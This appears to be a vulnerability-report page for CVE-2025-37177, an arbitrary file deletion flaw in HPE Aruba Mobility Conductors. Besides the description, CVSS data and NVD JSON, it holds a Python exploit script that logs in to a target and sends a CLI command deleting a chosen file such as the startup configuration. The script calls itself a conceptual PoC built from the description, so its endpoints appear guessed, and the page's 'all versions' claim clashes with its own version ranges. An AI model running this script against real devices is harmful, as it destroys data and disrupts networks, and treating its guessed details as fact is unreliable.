Security Vulnerability Report
中文
CVE-2025-37177 CVSS 6.5 MEDIUM

CVE-2025-37177

Published: 2026-01-13 20:16:06
Last Modified: 2026-01-23 16:10:10

Description

An arbitrary file deletion vulnerability has been identified in the command-line interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation of this vulnerability could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Mobility Conductors (AOS-10) - 所有版本
HPE Aruba Mobility Conductors (AOS-8) - 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37177 PoC - Arbitrary File Deletion in Aruba Mobility Conductor CLI # Note: This is a conceptual PoC based on the vulnerability description # Actual exploitation requires valid high-privilege credentials import requests import sys def exploit_aruba_file_deletion(target_ip, username, password, target_file): """ Exploit CVE-2025-37177 - Aruba Mobility Conductor Arbitrary File Deletion Args: target_ip: Target Mobility Conductor IP address username: High-privilege user account password: Account password target_file: File path to delete (e.g., /flash/config/ startup.cfg) Returns: bool: True if exploitation appears successful """ # Establish session with authentication session = requests.Session() # Login endpoint (typical Aruba Mobility Conductor management interface) login_url = f"https://{target_ip}/v1/api/login" login_data = { "username": username, "password": password } try: # Authenticate to obtain session response = session.post(login_url, json=login_data, verify=False, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print(f"[+] Successfully authenticated as {username}") # CLI command execution endpoint cli_url = f"https://{target_ip}/v1/api/cli" # Construct malicious CLI command to delete arbitrary file # The vulnerability allows deletion of files outside intended scope cli_payload = { "cmd": f"delete {target_file} flash" } # Execute the malicious command response = session.post(cli_url, json=cli_payload, verify=False, timeout=10) if response.status_code == 200: print(f"[+] File deletion command sent: {target_file}") print(f"[*] Response: {response.text}") return True else: print(f"[-] Command execution failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve_2025_37177.py <target_ip> <username> <password> <file_to_delete>") print("Example: python cve_2025_37177.py 192.168.1.1 admin admin /flash/config/startup.cfg") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] file_path = sys.argv[4] print(f"[*] Targeting HPE Aruba Mobility Conductor: {target}") print(f"[*] CVE-2025-37177 - Arbitrary File Deletion") exploit_aruba_file_deletion(target, user, pwd, file_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37177", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.853", "lastModified": "2026-01-23T16:10:10.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file deletion vulnerability has been identified in the command-line interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation of this vulnerability could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}, {"lang": "es", "value": "Una vulnerabilidad de eliminación arbitraria de archivos ha sido identificada en la interfaz de línea de comandos de los conductores de movilidad que ejecutan sistemas operativos AOS-10 o AOS-8. La explotación exitosa de esta vulnerabilidad podría permitir a un actor malicioso remoto autenticado eliminar archivos arbitrarios dentro del sistema afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}